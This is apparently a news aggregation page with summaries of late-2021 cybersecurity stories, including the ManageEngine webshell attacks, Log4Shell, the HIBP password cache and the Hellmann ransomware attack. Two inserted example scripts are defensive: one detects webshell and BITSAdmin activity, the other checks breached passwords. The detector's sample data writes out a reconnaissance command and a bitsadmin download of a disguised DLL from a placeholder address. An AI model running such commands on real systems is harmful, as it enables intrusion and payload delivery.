More stories

  • Ubisoft confirms Just Dance data breach amid developer exodus

    Gaming giant Ubisoft has confirmed a cyberattack on its IT infrastructure targeting the popular game Just Dance. The company explained that the incident “was the result of a misconfiguration, that once identified, was quickly fixed, but made it possible for unauthorized individuals to access and possibly copy some personal player data.” 

    Ubisoft did not respond to requests for comment about how many people were affected by the incident. “The data in question was limited to ‘technical identifiers’ which include GamerTags, profile IDs, and Device IDs as well as Just Dance videos that were recorded and uploaded to be shared publicly with the in-game community and/or on your social media profiles,” the Just Dance team explained in a note on Ubisoft’s message board. “Our investigation has not shown that any Ubisoft account information has been compromised as a result of this incident.”

    Anyone affected by the breach will receive an email from Ubisoft and will be given more information through the company’s support team. The team urged players to enable two-factor authentication and to reset any passwords. Ubisoft added that it took “all the proactive measures necessary” to secure its infrastructure from future cyberattacks.

    Axios reported on Monday that Ubisoft has faced a wave of departures over the last 18 months due to low pay, organizational dysfunction, and a stream of scandals. A developer who left recently told Axios that they were contacted by a co-worker for help in fixing a game because no one left at the company knew what to do. Employees have called it the “great exodus” and explained that the loss of talent was damaging their ability to push out games. Several hundred current and former employees signed an open letter earlier this year, criticizing Ubisoft for not doing enough to address problems within the company.

    In October 2020, the Egregor ransomware gang said it breached the Ubisoft network and stole data, leaking about 20 MB on its leak site. Ubisoft never commented on the breach. The company was also attacked in 2013; according to the BBC, the accounts of 58 million people were accessed. Ubisoft has sold millions of copies of Just Dance since it debuted in 2009.

  • FBI: Hackers are actively exploiting this flaw on ManageEngine Desktop Central servers

    The FBI’s cyber division has issued an alert warning enterprises using Zoho-owned ManageEngine’s Desktop Central that advanced attackers have been exploiting a flaw to install malware since late October.


    Zoho released a patch for an authentication bypass flaw, CVE-2021-44515, on December 3, warning at the time that it had seen “indications of exploitation” and urging customers to update immediately. Zoho didn’t provide further details of the attacks at the time, which followed activity this year targeting previously patched flaws in ManageEngine products tracked as CVE-2021-40539 and CVE-2021-44077. However, the FBI says in the new alert that advanced persistent threat (APT) actors have been exploiting CVE-2021-44515 since at least October 2021. “Since at least late October 2021, APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers,” the FBI alert said.

    Microsoft has previously attributed some of the earlier activity to a Chinese hacker group that was installing web shells on compromised servers to gain persistence. The flaws affected IT management products used by end-user organizations and managed service providers. The FBI now says it observed APT actors compromising Desktop Central servers using CVE-2021-44515 to drop a webshell that overrides a legitimate function of Desktop Central. The attackers then downloaded post-exploitation tools, enumerated domain users and groups, conducted network reconnaissance, attempted lateral movement across the network and dumped credentials.

    ManageEngine is the enterprise IT management software division of Zoho, a company well known for its software-as-a-service products. The flaw affects Desktop Central software for both enterprise customers and the version for managed service provider (MSP) customers.

    The FBI has filled in some details about how attackers are abusing the flaw after obtaining samples that were downloaded from likely compromised ManageEngine ADSelfService Plus servers. It has seen attackers upload two variants of web shells with the filenames emsaler.zip (variant 1, late October 2021), eco-inflect.jar (variant 1, mid-November 2021) and aaa.zip (variant 2, late November 2021). The webshell overrides the legitimate Desktop Central application protocol interface servlet endpoint. The webshell is also used for reconnaissance and domain enumeration. Eventually, the attackers install a remote access tool (RAT) for further intrusion, lateral movement, and credential dumping using the penetration testing tool Mimikatz and LSASS process memory dumping. The attackers also used the Windows authentication protocol WDigest to steal credentials through an LSASS dump, signaling that the attackers were using so-called ‘living off the land’ legitimate tools for nefarious purposes. Other tools in this category include Microsoft’s BITSAdmin command-line tool, used “to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe”, according to the FBI. ManageEngine has strongly advised customers to update their installations to the latest build as soon as possible.
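    Added example, not code from the FBI, ManageEngine or ZDNet: a small detector that runs over constructed Windows process-creation events and flags the two living-off-the-land patterns the alert describes, a command shell spawned by the Desktop Central web application (webshell-driven reconnaissance) and a BITSAdmin transfer dropping a file with a system DLL name such as mscoree.dll outside the Windows directory. The Desktop Central process path, the list of reconnaissance child processes and the 198.51.100.7 address are assumptions chosen for the demonstration.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record: image path, parent image path, command line."""
    image: str
    parent: str
    cmdline: str


# Assumptions, not facts from the FBI alert: the Desktop Central web application
# runs under a process whose path contains "DesktopCentral" (placeholder path),
# and these child processes are what webshell-driven recon typically spawns.
WEBAPP_PARENT_MARKER = "desktopcentral"
RECON_CHILDREN = {"cmd.exe", "powershell.exe", "net.exe", "net1.exe", "nltest.exe", "whoami.exe"}
# DLL names that belong under the Windows directory; a copy landing elsewhere is suspect.
SYSTEM_DLL_NAMES = {"mscoree.dll"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample telemetry (not real events). 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    ProcessEvent(  # shell launched by the web application process: webshell pattern
        image=r"C:\Windows\System32\cmd.exe",
        parent=r"C:\Program Files\DesktopCentral_Server\jre\bin\java.exe",  # placeholder
        cmdline=r'cmd.exe /c net user /domain'),
    ProcessEvent(  # BITSAdmin fetching a file named like a system DLL into a user path
        image=r"C:\Windows\System32\bitsadmin.exe",
        parent=r"C:\Windows\System32\cmd.exe",
        cmdline=r"bitsadmin /transfer sync /download /priority high "
                r"http://198.51.100.7/mscoree.dll C:\Users\Public\mscoree.dll"),
    ProcessEvent(  # ordinary BITSAdmin use by an update job: worth a look, not an alarm
        image=r"C:\Windows\System32\bitsadmin.exe",
        parent=r"C:\Windows\System32\svchost.exe",
        cmdline=r"bitsadmin /transfer agentupdate https://updates.example.test/agent.msi "
                r"C:\ProgramData\Updates\agent.msi"),
    ProcessEvent(  # benign desktop activity
        image=r"C:\Windows\System32\notepad.exe",
        parent=r"C:\Windows\explorer.exe",
        cmdline=r"notepad.exe notes.txt"),
]


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def check_webshell_child(ev: ProcessEvent) -> Optional[Tuple[str, str]]:
    """A recon tool or shell whose parent is the web application process."""
    if WEBAPP_PARENT_MARKER in ev.parent.lower() and basename(ev.image) in RECON_CHILDREN:
        return ("webshell_child_process", "high")
    return None


def check_bitsadmin_download(ev: ProcessEvent) -> Optional[Tuple[str, str]]:
    """BITSAdmin pulling a file from a URL; escalate when the destination reuses a system DLL name."""
    if basename(ev.image) != "bitsadmin.exe":
        return None
    low = ev.cmdline.lower()
    if "/transfer" not in low and "/addfile" not in low:
        return None
    if not URL_RE.search(ev.cmdline):
        return None
    # In "bitsadmin /transfer <job> [flags] <url> <local>", the local path is the last token.
    dest = ev.cmdline.split()[-1]
    if basename(dest) in SYSTEM_DLL_NAMES and "\\windows\\" not in dest.lower():
        return ("bitsadmin_download_system_dll_name", "high")
    return ("bitsadmin_download", "medium")


RULES = [check_webshell_child, check_bitsadmin_download]


def scan(events) -> List[Tuple[str, str, str]]:
    """Return (rule, severity, command line) for every rule that fires."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((hit[0], hit[1], ev.cmdline))
    return findings


if __name__ == "__main__":
    for rule, severity, cmd in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {rule}: {cmd}")
```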

  • Log4j flaw: 10 questions you need to be asking

    The UK National Cyber Security Centre (NCSC) is urging company boards to start asking key questions about how prepared they are to mitigate and remediate the widespread, critical Log4Shell flaw in Log4j, the Java-based application error logging component. NCSC calls Log4Shell “potentially the most severe computer vulnerability in years” and has called upon company boards to treat this bug with urgency. It stresses that the Log4j bug – also known as Log4Shell – sits in a software component rather than a piece of software, which means it will be much more complicated to patch. Log4Shell is bad news today and will likely lurk in enterprise systems for years despite major efforts from the US government, big tech and open-source contributors to address flaws in the original Log4j version 2 project, its implementation in major software products, and its deployment in hundreds of millions of enterprise applications, servers and internet-facing devices.

    There are ongoing efforts via the Apache Foundation to patch the core Log4j project, as well as downstream efforts by IBM, Cisco, Oracle, VMware and others to patch products containing vulnerable versions of the Log4j component. Google has also released tools to prevent developers using vulnerable Log4j versions in new builds of open-source software. And the US government has ordered all federal agencies to patch or mitigate Log4Shell by Christmas.

    The urgency is justified. State-sponsored hackers have started scoping out the bug for potential future attacks, according to Microsoft and Google, while cyber criminals are figuring out how to profit from it. Meanwhile, the Belgian Ministry of Defense confirmed an attack on its network using the Log4j bug.

    Key challenges NCSC outlines include organizations finding out what services use Log4j; identifying which of these services an organization uses; and then finding out if these services are vulnerable. CISA has already required all US federal agencies to enumerate any external-facing devices with Log4j installed. That’s no small task, especially given the number of affected products from Cisco, IBM, Oracle and VMware. Because of the component’s widespread use in other products, CISA estimates hundreds of millions of devices worldwide are exposed. “How concerned should boards be?” NCSC asks.

    Very, unless a business can afford disruptions to its operations from ransomware. While Microsoft has not found instances of the more dangerous human-operated ransomware using the vulnerability, it has seen Iranian threat actors tooling up to use it for ransomware attacks. NCSC has posed 10 questions for boards worried about the flaw:

    1. Who is leading on our response?
    2. What is our plan?
    3. How will we know if we’re being attacked and can we respond?
    4. What percentage visibility of our software/servers do we have?
    5. How are we addressing shadow IT/appliances?
    6. Do we know if key providers are covering themselves?
    7. Does anyone in our organisation develop Java code?
    8. How will people report issues they find to us?
    9. When did we last check our business continuity plans and crisis response?
    10. How are we preventing teams from burning out?

    Boards should also consider Log4Shell’s impact if the business needs to disclose where personal data was affected, as well as any costs linked to incident response and recovery, and damage to reputation. “Managing this risk requires strong leadership, with senior managers working in concert with technical teams to initially understand their organisation’s exposure, and then to take appropriate actions.”

    NCSC says Log4Shell warrants organizations creating a “tiger team” of core staff, including a leader, to address the threat. Boards should also ask ‘what’s our plan?’ and understand how Log4j issues will be remedied. Boards should understand this will take weeks or months to remediate, not days. Boards should know how the company is prepared to respond to a Log4Shell attack if and when it happens, and whether the company can detect such an attack if it were to take place. NCSC stresses that boards should understand what visibility their teams have of vulnerable software and servers, including IT assets that are centrally managed and unmanaged.

    The software supply chain is another key consideration. NCSC recommends organizations have an “open and honest conversation” with software-as-a-service suppliers that may also be trying to get a grip on which of their products are affected. Java is a hugely popular programming language in enterprise IT that’s used by an estimated 12 million developers worldwide. “Java developers may have legitimately used Log4j, so it’s important to ensure that any software written is not vulnerable,” NCSC notes. As it has previously noted, Log4j version 2 (Log4j2) ships with popular Apache frameworks including Struts2, Solr, Druid, Flink, and Swift.

    Finally, after two years of supporting remote work during the pandemic, a year of professional ransomware attacks, state-sponsored attacks on the software supply chain, and the critical Exchange Server zero-day vulnerabilities, NCSC is warning that some cybersecurity teams could suffer burnout during Log4Shell remediation. This is a board-level concern. “Remediating this issue is likely to take weeks, or months for larger organisations. The combination of an ever evolving situation (and the potential for severe impacts) can lead to burnout in defenders, if they’re not supported by leadership,” NCSC stressed.

  • Police found 225 million stolen passwords hidden on a hacked cloud server. Is yours one of them?

    The UK National Crime Agency (NCA) and National Cyber Crime Unit (NCCU) have discovered a cache of 225 million stolen emails and passwords and handed them to HaveIBeenPwned (HIBP), the free service for tracking credentials stolen and/or leaked through past data breaches. The 225 million new passwords become part of HIBP’s existing body of 613 million passwords in the Pwned Passwords set, which offers website operators the hashes of the passwords so they can ensure users don’t use them when creating a new account. Individuals can use HIBP’s Pwned Passwords page to see whether their passwords have been leaked in previous breaches.


    The service helps organizations meet NIST’s recommendation that users should be prevented from using any password that was previously exposed in a breach. That requirement aims to address the increasing use of “credential stuffing”, where criminals test large lists of leaked and commonly-used username and password combinations against various online accounts. The technique has been used to compromise 50,000 online bank accounts since 2017, the FBI warned last year, and works because many people still use the same password to protect multiple accounts; if any of the accounts protected with the common password was breached, the person’s other accounts become vulnerable to credential stuffing. The technique became a problem a decade ago after billions of credentials were leaked online following major data breaches, giving attackers huge credential data sets to test against accounts of varying importance, ranging from online game accounts to bank accounts and employee accounts. NCA and NCCU came across the cache of stolen credentials at a compromised but unnamed cloud storage facility.

    “During recent NCA operational activity, the NCCU’s Mitigation@Scale team were able to identify a huge amount of potentially compromised credentials (emails and associated passwords) in a compromised cloud storage facility,” the NCA said in a statement to HIBP. “Through analysis, it became clear that these credentials were an accumulation of breached datasets known and unknown. The fact that they had been placed on a UK business’s cloud storage facility by unknown criminal actors meant the credentials now existed in the public domain, and could be accessed by other 3rd parties to commit further fraud or cyber offences.”

    The NCA told the BBC that last year, working with UK police, it identified that there had been a compromise of a UK organisation’s cloud storage facility, leading to over 40,000 files being uploaded to their servers by cyber criminals. Among these files was the collection of compromised emails and passwords. NCA handed the compromised passwords to HIBP’s operator, Troy Hunt, who verified NCCU’s findings that the passwords were not in the existing Pwned Passwords data set. New passwords included in the cache, he said, included:

    • flamingo228
    • Alexei2005
    • 91177700123
    • Testsaganesq

    “The NCCU’s Mitigation@Scale team conducted a comparison of the compromised data against the HIBP password repository to identify any previously unseen passwords now in the public domain,” NCA said. Organisations can download the hashed data set in SHA-1 format in a compressed 17.2GB file. It’s the first version to include a regularly updated list of compromised credentials that law enforcement, such as the FBI, discover during investigations. Hunt stressed the passwords supplied to HIBP by the FBI and NCA are not for his service but for the community, since they can be used by anyone to meet NIST’s recommendations to mitigate credential stuffing.

    “Today’s release brings the total Pwned Passwords count to 847,223,402, a 38% increase over the last version. More significantly, if we take the prevalence counts into consideration that’s 5,579,399,834 occurrences of a compromised password represented in this corpus,” explains Hunt.
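    An added example (not HIBP’s, the NCA’s or ZDNet’s code) of how a site operator uses the downloadable SHA-1 data set described above: parse the “hash:count” line format, reject a candidate password at registration when its SHA-1 appears, sum the prevalence counts the way Hunt’s occurrence figure is derived, and fold a newly recovered batch of plaintext passwords in while counting how many were previously unseen, as NCCU’s comparison did. The hash entries are constructed sample data, not lines from the real corpus.

```python
import hashlib
from typing import Dict, Iterable, Tuple


def sha1_upper(password: str) -> str:
    """Hash a password the way the Pwned Passwords list stores it: SHA-1, uppercase hex."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


# Constructed sample in the offline "<SHA-1>:<prevalence count>" format (not real corpus data).
# The first two digests are the well-known SHA-1 values of "password" and "123456"; the third is
# computed here for one of the NCA-supplied passwords named in the article. Counts are invented.
SAMPLE_PWNED_FILE = (
    "5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8:1234\n"
    "7C4A8D09CA3762AF61E59520943DC26494F8941B:250000\n"
    f"{sha1_upper('flamingo228')}:7\n"
)


def load_pwned(lines: Iterable[str]) -> Dict[str, int]:
    """Parse hash:count lines into a lookup table, rejecting malformed entries."""
    index: Dict[str, int] = {}
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        digest, _, count = line.partition(":")
        if len(digest) != 40 or not count.isdigit():
            raise ValueError(f"malformed Pwned Passwords entry: {line!r}")
        digest = digest.upper()
        index[digest] = index.get(digest, 0) + int(count)
    return index


PWNED_INDEX = load_pwned(SAMPLE_PWNED_FILE.splitlines())


def check_password(password: str, index: Dict[str, int] = PWNED_INDEX) -> Tuple[bool, int]:
    """Return (seen_in_breaches, prevalence_count) for a candidate password."""
    count = index.get(sha1_upper(password), 0)
    return count > 0, count


def total_occurrences(index: Dict[str, int] = PWNED_INDEX) -> int:
    """Sum of prevalence counts: how Hunt's 'occurrences of a compromised password' figure is formed."""
    return sum(index.values())


def merge_new_batch(index: Dict[str, int], new_plaintexts: Iterable[str]) -> int:
    """Fold a recovered batch of plaintext passwords into the index; return how many were unseen."""
    unseen = 0
    for pw in new_plaintexts:
        h = sha1_upper(pw)
        if h not in index:
            unseen += 1
        index[h] = index.get(h, 0) + 1
    return unseen


def registration_guard(password: str, index: Dict[str, int] = PWNED_INDEX, min_length: int = 8) -> str:
    """What a signup form would do with the NIST breached-password check: 'ok' or a reason."""
    if len(password) < min_length:
        return f"too short (minimum {min_length} characters)"
    pwned, count = check_password(password, index)
    if pwned:
        return f"seen {count} times in breach data; choose another"
    return "ok"


if __name__ == "__main__":
    for candidate in ("password", "flamingo228", "correct horse battery staple"):
        print(candidate, "->", registration_guard(candidate))
    print("total occurrences in sample:", total_occurrences())
```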

  • Cybersecurity company identifies months-long attack on US federal commission

    The United States Commission on International Religious Freedom (USCIRF) has been hit with a cyberattack, according to cybersecurity firm Avast. Avast did not identify the federal agency affected, but The Record was able to determine it was the USCIRF. The Cybersecurity and Infrastructure Security Agency (CISA) declined to comment on the attack and said all requests for more information should go to USCIRF. USCIRF did not respond to requests for comment.

    Created in 1998, USCIRF describes itself as a US federal government commission that monitors the right to freedom of religion or belief abroad. “USCIRF uses international standards to monitor religious freedom violations globally, and makes policy recommendations to the President, the Secretary of State, and Congress,” the organization said on its website. In Avast’s report, the company said attackers were able to compromise systems on USCIRF’s network in a way that “enabled them to run code as the operating system and capture any network traffic traveling to and from the infected system.” The report notes that there is evidence that the attack was done in multiple stages and may have involved “some form of data gathering and exfiltration of network traffic.”

    “Further because this could have given total visibility of the network and complete control of an infected system it is further reasonable speculation that this could be the first step in a multi-stage attack to penetrate this, or other networks more deeply in a classic APT-type operation,” Avast said. “That said, we have no way to know for sure the size and scope of this attack beyond what we’ve seen. The lack of responsiveness is unprecedented and cause for concern. Other government and non-government agencies focused on international rights should use the IoCs we are providing to check their networks to see if they may be impacted by this attack as well.”

    Avast said the attack has been going on for months, yet USCIRF and CISA refused to engage with them when notified. They allegedly tried multiple channels over the course of months to help resolve the issue but were ignored after initial communications. “The attempts to resolve this issue included repeated direct follow up outreach attempts to the organization. We also used other standard channels for reporting security issues directly to affected organizations and standard channels the United States Government has in place to receive reports like this,” Avast explained. “In these conversations and outreach we have received no follow up or information on whether the issues we reported have been resolved and no further information was shared with us. Because of the lack of discernible action or response, we are now releasing our findings to the community so they can be aware of this threat and take measures to protect their customers and the community.”

    An Avast spokesperson told ZDNet that after the report was published, they were contacted by CISA. The company admitted that its analysis was based on two files it observed in the attack and noted that without more information from USCIRF, it was hard to know who the attackers are, what their motive is and the potential impact of the attack. The Avast spokesperson said that with the ability to intercept and possibly exfiltrate all local network traffic from USCIRF, the backdoor “had the potential to give the attackers total visibility of the network including information exchanged with other agencies, or international governmental or non governmental organizations, and complete control of the agencies’ system.” “Fixing the issue therefore is essential, however since the agency didn’t respond to us, we can’t tell whether the issues we reported have been resolved,” the spokesperson said. “Taken altogether, this attack could have given total visibility of the network and complete control of a system and thus could be used as the first step in a multi-stage attack to penetrate this, or other networks more deeply.”

    It has been about one year since the SolarWinds attack, where hackers for the Russian government spent months inside the systems of multiple US government agencies including the Justice Department, Treasury Department, Department of Homeland Security, State Department and Department of Energy.

  • Belgian Defense Ministry confirms cyberattack through Log4j exploitation

    The Belgian Ministry of Defense has confirmed a cyberattack on its networks that involved the Log4j vulnerability. In a statement, the Defense Ministry said it discovered an attack on its computer network with internet access on Thursday. They did not say if it was a ransomware attack but explained that “quarantine measures” were quickly put in place to “contain the infected elements.”


    “Priority was given to the operability of the network. Monitoring will continue. Throughout the weekend, our teams were mobilized to contain the problem, continue our operations and alert our partners,” the Defense Ministry said. “This attack follows the exploitation of the Log4j vulnerability, which was made public last week and for which IT specialists around the world are jumping into the breach. The Ministry of Defense will not provide any further information at this stage.”

    Multiple reports from companies like Google and Microsoft have indicated that government hacking groups around the world are leveraging the Log4j vulnerability in attacks. According to Microsoft, state-sponsored hackers from China, Turkey, Iran and North Korea have started testing, exploiting and using the Log4j bug to deploy a variety of malware, including ransomware. A number of reports have noted that since the vulnerability was discovered nearly two weeks ago, cybercriminal groups have sought to not only use it to gain a foothold in networks but sell that access to others, including governments. Governments around the world have urged agencies and organizations to patch their systems or figure out mitigations in order to avoid attacks and breaches. The US’ Cybersecurity and Infrastructure Security Agency ordered all federal civilian agencies to patch systems before Christmas and Singapore held emergency meetings with critical information infrastructure sectors to prepare them for potential Log4j-related threats.

    Centre for Cybersecurity Belgium spokesperson Katrien Eggers told ZDNet that they too sent out a warning to Belgian companies about the Apache Log4j software issue, writing that any organization that had not already taken action should “expect major problems in the coming days and weeks.” “Because this software is so widely distributed, it is difficult to estimate how the discovered vulnerability will be exploited and on what scale,” the Centre for Cybersecurity Belgium said, adding that any affected organizations should contact them. “It goes without saying that this is a dangerous situation.”

  • Cybersecurity company ZeroFox acquires IDX, merges with L&F to create $1.4 billion entity

    SaaS cybersecurity company ZeroFox said on Monday that it has completed a deal to acquire digital privacy protection platform IDX and merge with special purpose acquisition company L&F Acquisition Corp. to create a new entity with an expected equity value of approximately $1.4 billion. The company will be renamed ZeroFox Holdings once the deal goes through and will have the ticker symbol “ZFOX.” The companies expect the deal to close in the first half of 2022. Monarch Alternative Capital LP and several other firms are also investing $170 million in the deal to merge the companies.

    James Foster, chairman and CEO of ZeroFox, said the transaction allows them to create “the industry’s first publicly traded company that is focused on providing an enterprise external cybersecurity SaaS platform.” “We intend to leverage this growth capital to continue investing in our artificial intelligence capabilities, scaling our go-to-market efforts, and expanding our world-class team,” Foster said. The company was founded in 2013 and now has customers in more than 50 countries. Foster told ZDNet that the merger is their best path forward in the current market environment because it provides all the benefits that come from an IPO and being traded on the New York Stock Exchange, without requiring them to go through a traditional IPO process, which he called “restrictive, time-consuming, costly and uncertain.”

    “Becoming a publicly traded company is the logical next step to supporting our development and accelerating our growth. This new source of capital will provide greater financial flexibility, in addition to the necessary scale and resources to effectively execute against our go-to-market strategy,” Foster explained, adding that IDX is “the nation’s largest provider of data breach response services.” “The combined SaaS business will have over 650 employees and serve approximately 1,700 customers including five of the Fortune Top 10 and the largest companies in media, technology, retail, and energy. Collectively, over 90% of our revenues will be recurring platform subscriptions. The platform will process billions of data elements and protect tens of millions of digital assets around the world.”

    IDX CEO Tom Kelly said the deal with ZeroFox is the result of a long-standing partnership between the two companies. Adam Gerchen, CEO of LNFA and a new ZeroFox board member, noted that the company is aiming to get a slice of the $51 billion external cybersecurity and digital protection market.


  • After ransomware attack, global logistics firm Hellmann warns of scam calls and mail

    German logistics giant Hellmann has warned its customers and partners to be on the lookout for fraudulent calls and mail after the company was hit with a ransomware attack two weeks ago. In an update about the cyberattack that initially forced them to remove all connections to their central data center, the company said business operations are back up and running but the “number of so-called fraudulent calls and mails has generally increased.”

    “The forensic investigation has meanwhile confirmed that data was extracted from our servers before our systems were taken offline on December 9. We are currently investigating what type of data was extracted and will proactively provide further information as soon as possible. We are in regular contact with relevant government authorities,” Hellmann said.

    “Whilst communication with Hellmann staff via email and telephone remains safe (inbound and outbound), please make sure that you are actually communicating with a Hellmann employee and beware of fraudulent mails/calls from suspicious sources, in particular regarding payment transfers, change bank account details or the like.”

    When news of the attack first broke on December 9, the company said the shutdown was having a “material impact” on their business operations. The German company operates in 173 countries, running logistics for a range of air and sea freights as well as rail and road transportation services. Air Cargo News, which first reported the attack, said the company had a revenue of nearly $3 billion last year. BleepingComputer reported last week that ransomware group RansomEXX has claimed responsibility for the attack. After negotiations with Hellmann fell apart, the group published 70.64 GB of stolen documents on their leak site that included business agreements, intra-company emails, and more, the outlet explained. They added that the leaks explained the increase in scam calls.

    In February, the criminal group that deploys the RansomEXX ransomware was caught abusing vulnerabilities in the VMware ESXi product, allowing them to take over virtual machines deployed in enterprise environments and encrypt their virtual hard drives. They were also identified by the FBI in November as one of the ransomware groups that use “significant financial events” as leverage during their attacks. “Ransomware groups are using events like mergers and acquisitions to target companies and force them into paying ransoms,” the FBI said. “A November 2020 technical analysis of Pyxie RAT, a remote access trojan that often precedes Defray777/RansomEXX ransomware infections, identified several keyword searches on a victim’s network indicating an interest in the victim’s current and near-future stock share price. These keywords included 10-q, 10-sb, n-csr, nasdaq, marketwired, and newswire.”